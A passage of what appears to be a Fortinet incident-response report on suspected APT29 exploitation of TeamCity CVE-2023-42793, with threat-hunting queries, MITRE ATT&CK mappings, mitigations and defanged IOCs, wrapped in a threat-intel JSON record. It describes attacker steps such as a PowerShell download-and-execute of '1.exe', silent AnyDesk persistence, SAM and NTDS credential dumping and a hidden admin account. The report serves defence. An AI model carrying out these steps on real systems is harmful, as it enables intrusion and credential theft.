The threat actor used the\r\n‘DownloadFile’ method of the PowerShell ‘WebClient’ class to download the Amazon-hosted payload. The file was saved as\r\n‘1.exe’ in the path ‘C:\\Windows\\Temp\\1.exe’. After downloading this file, the threat actor attempted to execute it using the\r\ncommand ‘cmd.exe /c C:\\Windows\\Temp\\1.exe’. Windows Defender logs indicate this file was detected as\r\nTrojan:Script/Phonzy.B!ml malware shortly after download and was deleted before it could be\r\nexecuted. Associated log events within the teamcity-server.log linked to this download activity are shown in Figure 22.\r\nFigure 22: TeamCity log showing download and execution of 1.exe by the threat actor.\r\nAnother threat actor used their TeamCity exploit to download and execute the installer for the legitimate remote access software\r\nAnyDesk on HOST_1_TEAMCITY. The AnyDesk software was installed with the ‘--start-with-win’ parameter, making\r\nit auto-start on boot. The ‘--silent’ parameter was also used, which prevents the AnyDesk application from showing any\r\nmessages or errors during execution. The threat actor then set a password for AnyDesk and executed it with the ‘--get-id’\r\nparameter to retrieve the AnyDesk-ID. This ID is used to connect to an instance of AnyDesk. This software is an\r\nimplementation of a command-and-control technique (T1219[22]) and also supports persistence, as the threat actor can use\r\nthe AnyDesk-ID to connect to a running instance of the software. Log events associated with these activities in the teamcity-server.log snippet are shown in Figure 23.\r\nFigure 23: The TeamCity log showing the installation and execution of the AnyDesk remote access tool.\r\nThe Fortinet IR team was able to link connections made from the host HOST_1_TEAMCITY by the AnyDesk application\r\nto IP address 92.38.177[.]14. On investigation, this was found to be an AnyDesk software relay address. 
Using relays as\r\npart of AnyDesk infrastructure allows threat actors to abstract their own infrastructure from intrusions. FortiGuard CTS\r\ninformation for the relay IP is shown in Figure 24. It’s worth noting that FortiGuard CTS marked this as clean because\r\nAnyDesk is a common remote management tool that, by default, uses AnyDesk infrastructure, which is not malicious by\r\nitself.\r\nFigure 24: FortiGuard CTS screen with information about the AnyDesk relay IP address.\r\nThe connections made by AnyDesk.exe can be seen in Figure 25.\r\nFigure 25: An AnyDesk.exe TCP/IP connection from host HOST_1_TEAMCITY to the internet.\r\nThese actors tried one or two methods but did not conduct further activity on the server or victim network. They likely\r\nlacked the knowledge or interest to pursue further intrusion on the victim network, as their initial efforts were ineffective.\r\nConclusion\r\nThis article provided details of several intrusions where the TeamCity vulnerability CVE-2023-42793 was exploited to gain\r\naccess to the victim network. Observed exploitation originated from multiple disparate threat actors who employed\r\nnumerous diverse post-exploitation techniques in an attempt to gain a foothold in the victim network. It should be noted that\r\nthis activity occurred after the vendor (JetBrains) had provided a valid patch.\r\nWhile the security controls in place within the victim's environment were able to keep the majority of adversaries at bay, a\r\nfailure to adequately triage alerts generated by the victim's EDR (FortiEDR) and subsequent downgrading of protections\r\nopened gaps in the victim's defenses. 
This allowed the main threat actor to establish a foothold and eventually gain the\r\naccess required to maneuver freely through the network.\r\nAs part of this intrusion, the main threat actor employed the GraphicalProton malware to maintain access. The main threat\r\nactor primarily used Scheduled Tasks (T1053.005[23]) to execute these GraphicalProton payloads. Their preferred method\r\nof defense evasion for these scheduled tasks was rundll32 proxy execution, but the threat actor was also able to employ\r\nseveral legitimate third-party binaries that were vulnerable to search order hijacking to execute their malware. Given the\r\ntechnique crossover with previously reported activity and the identification of the GraphicalProton payload, FortiGuard\r\nbelieves with medium confidence that this attack was part of a new BlueBravo (tracked by Recorded Future[24])/APT29\r\n(tracked by Mandiant[25]) campaign. Of particular note are the significant OPSEC considerations employed throughout the\r\nintrusion (discounting the opendir web server fumble): the use of compromised infrastructure local to the victim, search\r\norder hijacking with legitimate DLLs added after execution, the quality of masquerading, and the use of single-use\r\ninfrastructure components.\r\nMITRE ATT\u0026CK mappings, mitigation suggestions, and threat-hunting queries are provided below to assist organizations\r\nin identifying similar activity in their environments. IOCs have also been provided for completeness.\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nAntiVirus: W64/GraphicalProton.A!tr\r\nAntiVirus: W64/Dukes.O!tr\r\nAntiVirus: W32/Dukes.P!tr\r\nAntiVirus: W32/PossibleThreat\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. 
The FortiGuard AntiVirus engine\r\nis a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nFortinet has also released an IPS signature to proactively protect our customers from the threats contained in the report:\r\nCVE-2023-42793: JetBrains.TeamCity.CVE-2023-42793.Authentication.Bypass\r\nThe URLs are rated as “Malicious Websites” and “Malicious Activities Found” by the FortiGuard Web Filtering service.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks these attacks by aggregating malicious source\r\nIP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global\r\nsources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard\r\nIncident Response Team.\r\nThreat Hunting\r\nThe following Threat Hunting query will search for a network socket connected by rundll32.exe whose command line contains the same\r\nDLL filenames as those observed in this intrusion.\r\nType: (\"Socket Connect\") AND Source.Process.Name: (\"rundll32.exe\") AND Source.Process.CommandLine:\r\n(\"\\\"AclNumsInvertHost.dll\\\", AclNumsInvertHost\" OR \"\\\"UnregisterAncestorAppendAuto.dll\\\",\r\nUnregisterAncestorAppendAuto\")\r\nThe following Threat Hunting query will search for process creation events where rundll32.exe launches cmd.exe and\r\nexecutes any of the commands run by the malicious DLL upon execution.\r\nType: (\"Process Creation\") AND Source.Process.Name: (\"rundll32.exe\") AND Target.Process.File.Name: (\"cmd.exe\") AND\r\nTarget.Process.CommandLine: (\"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 netstat \\-afn \\-p TCP\\\"\" OR \"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 wmic\r\ndatafile where Name\\=\\\"C\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\ntoskrnl.exe\\\" get Version\\\"\" OR 
\"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 echo\r\n%userdomain%\\*%computername%\\*\\*%username%\\\"\" OR \"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 tasklist\\\"\")\r\nThe following Threat Hunting query will search for process creation of scheduled tasks using schtasks.exe with type\r\nONLOGON or ONSTART and with the following filenames (iisexpresstray.exe, AclNumsInvertHost.dll,\r\nUnregisterAncestorAppendAuto.dll), which were used throughout this intrusion for persistence.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 22 of 31\n\nType: (\"Process Creation\") AND Target.Process.File.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (create\r\n\\/SC AND (ONLOGON OR ONSTART)) AND Target.Process.CommandLine:(iisexpresstray.exe OR\r\nAclNumsInvertHost.dll OR UnregisterAncestorAppendAuto.dll OR DefenderUPDService OR IISUpdateService)\r\nThe following Threat Hunting query will search for an event where a particular task creation was being verified by the threat\r\nactor.\r\nType: (\"Process Creation\") AND Target.Process.File.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (\"\\/Query\r\n\\/TN \\\\Microsoft\\\\Windows\\\\DefenderUPDService \\/FO LIST \\/V\")\r\nThe following Threat Hunting query will search for an event where TeamCity process (java.exe) creates a process of\r\nWindows task management utility (schtasks.exe). Keep in mind that this query might have false positives where there is an\r\nofficial need for Java applications to launch the schedule task utility.\r\nType: (\"Process Creation\") AND Source.Process.Name: (\"java.exe\") AND Target.Process.File.Name: (\"schtasks.exe\")\r\nThe following Threat Hunting query will search for an event where schtasks.exe is the target process and the command line\r\ncontains rundll32.exe. 
Keep in mind this query might generate false positives in environments where scheduled\r\ntasks that invoke rundll32.exe are legitimately created using schtasks.exe.\r\nType: (\"Process Creation\") AND Target.Process.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (rundll32.exe)\r\nThe following Threat Hunting query will search for an event where rundll32.exe connects to login.microsoftonline[.]com\r\nor graph.microsoft[.]com over HTTP. Keep in mind that this query might generate false positives where there is a\r\nlegitimate use of rundll32.exe to connect to these URLs.\r\nType: (\"HTTP Request\") AND Source.Process.Name: (\"rundll32.exe\") AND URL:\r\n(\"https\\:\\/\\/login.microsoftonline.com\\:443\" OR \"https\\:\\/\\/graph.microsoft.com\\:443\")\r\nMITRE ATT\u0026CK\r\nTA0042: Resource Development\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1584.004\r\nCompromise\r\nInfrastructure:\r\nServer\r\nThe threat actor(s) had compromised a server of an educational institution. A\r\nmalicious DLL file connected to this compromised server as a C2. The IR team\r\nsuspects that this server acts as a connection forwarder to the real C2.\r\nMitigation\r\nMitigation is difficult using preventive controls, as the infrastructure is outside the scope of the enterprise.\r\nFortinet Security Fabric Controls:\r\nN/A\r\nTA0043: Reconnaissance\r\nTechnique Technique Description Observed Activity\r\nT1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nThe threat actor(s) performed vulnerability scans using Nuclei to check if\r\nthe TeamCity server was vulnerable to CVE-2023-42793.\r\nMitigation\r\nTraffic pattern inspection for the specific URL pattern used in a vulnerability check can be done. 
Also,\r\nmonitoring of network data for uncommon data flows can be done to identify abnormal activity.\r\nFortinet Security Fabric Controls:\r\nFortiGate, FortiSIEM\r\nTA0001: Initial Access\r\nTechnique Technique Description Observed Activity\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nThe threat actor(s) exploited the vulnerability CVE-2023-42793 of the\r\npublic-facing TeamCity software host.\r\nMitigation\r\nWeb Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from\r\nreaching the application.\r\nSegment externally facing servers and services from the rest of the network with a DMZ or on separate\r\nhosting infrastructure.\r\nFortinet Security Fabric Controls:\r\nFortiWeb, FortiGate, FortiSIEM\r\nTA0002: Execution\r\nTechnique Technique Description Observed Activity\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows Command\r\nShell\r\nThe threat actor(s) executed cmd.exe through the vulnerable\r\nTeamCity software for various activities, including the download and\r\nexecution of malicious files.\r\nMitigation Blocking network connections from cmd.exe to external IP addresses, except for those on an allow list, is\r\nthe best way to limit this very prevalent TTP.\r\nDetection of cmd.exe being spawned by software services (e.g. java.exe in current scenario).\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 24 of 31\n\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiGate, FortiSIEM (detection)\r\nTechnique Technique Description Observed Activity\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nThe threat actor(s) used Windows Task Scheduler to create scheduled tasks\r\nto execute dropped payloads and maintain persistence.\r\nMitigation\r\nAudit the scheduled task on the hosts using a SIEM tool to identify abnormal tasks. 
\r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection), FortiEDR, FortiClient\r\nTechnique Technique Description Observed Activity\r\nT1047\r\nWindows Management\r\nInstrumentation\r\nThe threat actor(s) used the Windows Management Instrumentation\r\ncommand-line utility from HOST_1_TEAMCITY to connect to multiple\r\nother hosts for lateral movement.\r\nMitigation\r\nUse application control to block execution of wmic.exe if it is not required for a given system or network.\r\nThis ensures that potential misuse is prevented.\r\nAdvanced EDR products with behavioral detection can detect and block the use of WMIC for malicious\r\nbehaviors.\r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection), FortiEDR, FortiClient\r\nTA0003: Persistence\r\nTechnique Technique Description Observed Activity\r\nT1136.001\r\nCreate Account: Local\r\nAccount\r\nThe threat actor(s) created a Windows local administrator account\r\nthrough cmd.exe.\r\nMitigation\r\nNew account creation should be audited using Windows logs.\r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection)\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 25 of 31\n\nTechnique Technique Description Observed Activity\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nThe threat actor(s) used Windows Task Scheduler to create scheduled tasks\r\nto execute dropped payloads and maintain persistence.\r\nMitigation\r\nAudit the scheduled task on the hosts using SIEM tool for abnormal tasks. \r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection)\r\nTA0005: Defense Evasion\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1574.001\r\nHijack Execution\r\nFlow: DLL Search\r\nOrder Hijacking\r\nThreat actor(s) downloaded a number of legitimate signed executable files and\r\nmalicious DLLs in the same folder. The malicious DLLs were named similarly\r\nbut were different from their legitimate counterparts. 
A full list of vulnerable\r\nlegitimate software used in this way is available in Table 2 in the report.\r\nMitigation\r\nEnable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1564.002\r\nHide\r\nArtifacts:\r\nHidden\r\nUsers\r\nThreat actor(s) created a new local admin account and made that account a special\r\naccount by adding HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist to the registry path. This\r\nprevented the new account from being displayed on the GUI login screen.\r\nMitigation\r\nMonitor executed commands and arguments that could be used to add a new user and subsequently hide it\r\nfrom login screens. Advanced EDR solutions like FortiEDR can be used to monitor for associated registry\r\nchanges. Windows advanced logs can be ingested into SIEM to monitor these activities.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, Windows Advanced Logging, FortiSIEM, FortiSOAR\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 26 of 31\n\nTechnique Technique Description Observed Activity\r\nT1027.002\r\nObfuscated Files or Information: Software\r\nPacking\r\nMalicious DLL files were obfuscated to avoid\r\nanalysis.\r\nMitigation\r\nEmploy heuristic-based malware detection on endpoints and generate alerts for executables packed with\r\nknown packers.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient\r\nTechnique Technique Description Observed Activity\r\nT1218.011\r\nSystem Binary Proxy\r\nExecution: Rundll32\r\nThe actor(s) used the Windows utility rundll32.exe to execute malicious DLL\r\nfiles (GraphicalProton). 
This appeared to be the adversary’s primary/preferred\r\nmethod of DLL execution.\r\nMitigation\r\nA behavioral detection tool such as FortiEDR can be used to detect and block malicious activities\r\nperformed by files executed via rundll32.exe.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient, FortiSIEM, FortiSOAR\r\nTA0006: Credential Access\r\nTechnique Technique Description Observed Activity\r\nT1003.002\r\nOS Credential Dumping: Security\r\nAccount Manager\r\nThe threat actor had tried to dump SAM using the command\r\n‘reg.exe save HKLM\\SAM.’\r\nMitigation\r\nA modern EDR solution should detect and mitigate attempts to access and dump the SAM registry hive.\r\nFortinet Security Fabric Controls:\r\nFortiEDR\r\nTechnique Technique Description Observed Activity\r\nT1003.003\r\nOS Credential Dumping:\r\nNTDS\r\nThe threat actor had tried to dump Ntds.dit using the Windows utility\r\nntdsutil.exe.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 27 of 31\n\nMitigation\r\nA modern EDR solution should detect and mitigate attempts to access and dump NTDS files.\r\nFortinet Security Fabric Controls:\r\nFortiEDR\r\nTA0011: Command \u0026 Control\r\nTechnique Technique Description Observed Activity\r\nT1071.001\r\nApplication Layer Protocol: Web\r\nProtocols\r\nThe malicious DLL file made HTTPS web requests to the\r\nadversary’s C2.\r\nMitigation\r\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for\r\nspecific adversary malware can be used to mitigate activity at the network level.\r\nFirewalls should be able to block network connections with anomalous user-agent strings associated with\r\nnon-standard browsers. This can also reduce the effectiveness of this TTP if the adversary does not\r\nconfigure a user-agent to match the environment. 
It is possible to block C2 IPs/URLs obtained from a\r\nthreat intel feed at the gateway level.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiGate, FortiSIEM, FortiGuard Threat Intelligence\r\nTechnique Technique Description Observed Activity\r\nT1219\r\nRemote Access\r\nSoftware\r\nThe actor downloaded AnyDesk software as an alternative C2 method to gain\r\ndirect remote access to victim endpoints.\r\nMitigation\r\nApplication whitelisting is a great way of reducing the effectiveness of this TTP. Where this is not\r\nachievable, a modern EDR solution should be able to flag remote access software and other PUPs as\r\nsuspicious so they can be allowed explicitly if used legitimately in an environment. A network-level IDS\r\n(Intrusion Detection System) with the ability to detect AnyDesk software traffic would be able to block\r\nthis traffic.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient, FortiNDR, FortiAnalyzer, FortiSIEM, FortiSOAR\r\nTechnique Technique Description Observed Activity\r\nT1090.003 Proxy: Multi-hop Proxy The actor used the Tor network to launch exploit attacks.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 28 of 31\n\nMitigation\r\nTraffic to known anonymity networks and C2 infrastructures can be blocked through the use of network\r\nallow and block lists. Firewalls with deep inspection (e.g. FortiGate[26]) can block Tor traffic through\r\nApplication Control.\r\nFortinet Security Fabric Controls:\r\nFortiGate, FortiEDR, FortiClient\r\nIOCs\r\nThe following IOCs are from the investigation, analysis of the samples, and subsequent activity observed on the same host\r\nbetween initial detection and remediation by the customer. 
In addition to these IOCs directly observed by the FortiGuard IR\r\nteam, several samples that match the characteristics of observed samples have been included to assist with detecting\r\nhistorical activity.\r\nIndicator\r\nIndicator\r\nType\r\nAssociated\r\nTactic\r\nNotes\r\na66d76d86448965e57d7be96a57529c497e4b99d\r\nSHA1\r\nHash\r\nExecution File hash of 1.exe downloaded on\r\nhost\r\nd4411f70e0dcc2f88d74ae7251d51c6676075f6f\r\nFile hash of malicious DLL\r\nAclNumsInvertHost.dll\r\nf836173805a8c4d4ee319fdefe4a5e92f3f55f32\r\nFile hash of malicious DLL\r\nUnregisterAncestorAppendAuto.d\r\na4b03f1e981ccdd7e08e786c72283d5551671edf\r\nFile hash of malicious DLL\r\nModeBitmapNumericAnimate.dll\r\n8f5780056107dbc2bb59d63f454d8523091ddde2\r\nFile hash of malicious DLL\r\nMpCmdHelp.dll\r\n51aa6e5186ede77545e99b14b8f7e8180a0c6933\r\nFile hash of malicious DLL\r\noleac.dll\r\n4fed3d5de4df20d961831be6194b9d595b943bc9\r\nFile hash of malicious DLL\r\nPerformanceCaptionApi.dll\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 29 of 31\n\n682b9ac9448707024985ad54476acfbf642a03b9\r\nFile hash of malicious DLL\r\npdhui_1.dll\r\n3a32e516c037c37f7bf83171e167511ba53870a7\r\nFile hash of malicious DLL\r\nwinmm.dll\r\n2df317b8a408d2ad5c94b9de6f20bbef03e46066\r\nFile hash of malicious DLL\r\nmscorees.dll\r\nhxxp://bringthenoiseappnew.s3.amazonaws[.]com/ujwphtigdcokr\r\nURL C2\r\nC2 URL from which malicious\r\nexecutable downloaded\r\nhXXp[:]//103[.]76[.]128[.]34:8080/\r\nC2 URL from which malicious\r\nDLLs downloaded\r\nhXXps[:]//fisheries-states-codes-camps[.]trycloudflare[.]com/rcu\r\nC2 URL from which malicious\r\nexecutable downloaded\r\n128[.]199[.]207[.]131\r\nIP C2\r\nC2 IP address seen from\r\nGraphicalProton malware\r\n167[.]114[.]3[.]69\r\nArticle References\r\n[1] https://nvd.nist.gov/vuln/detail/CVE-2023-42793\r\n[2] https://www.sonarsource.com/blog/teamcity-vulnerability/\r\n[3] 
https://www.jetbrains.com/teamcity/\r\n[4] https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis\r\n[5] https://www.cisa.gov/news-events/alerts/2023/10/04/cisa-adds-two-known-exploited-vulnerabilities-catalog-removes-five-kevs\r\n[6] https://github.com/projectdiscovery/nuclei\r\n[7] https://github.com/projectdiscovery/nuclei-templates/blob/016d696c4c964f47580f21a1219f6c878264a7a0/http/cves/2023/CVE-2023-42793.yaml#L52C34-L52C34\r\n[8] https://crt.sh/?q=d88fbe100874149e0059203fc1873958cde569deae66e1d934083006a4d5a258\r\n[9] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing\r\n[10] https://www.wired.com/story/the-untold-story-of-solarwinds-the-boldest-supply-chain-hack-ever/\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 30 of 31\n\n[11] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[12] https://learn.microsoft.com/en-us/iis/extensions/introduction-to-iis-express/iis-express-overview\r\n[13] https://attack.mitre.org/techniques/T1036/005/\r\n[14] https://attack.mitre.org/techniques/T1574/001/\r\n[15] https://pubs.opengroup.org/onlinepubs/009604599/functions/opendir.html\r\n[16] https://attack.mitre.org/techniques/T1003/002/\r\n[17] https://attack.mitre.org/techniques/T1003/002/\r\n[18] https://attack.mitre.org/techniques/T1136/001/\r\n[19] https://attack.mitre.org/techniques/T1047/\r\n[20] https://github.com/ParrotSec/mimikatz\r\n[21] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[22] https://attack.mitre.org/techniques/T1219\r\n[23] https://attack.mitre.org/techniques/T1053/005\r\n[24] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[25] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing\r\n[26] https://community.fortinet.com/t5/FortiGate/Technical-Tip-Blocking-and-monitoring-Tor-traffic/ta-p/196239\r\nSource: 
https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 31 of 31",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793"
	],
	"report_names": [
		"teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434336,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.pdf",
		"text": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.txt",
		"img": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.jpg"
	}
}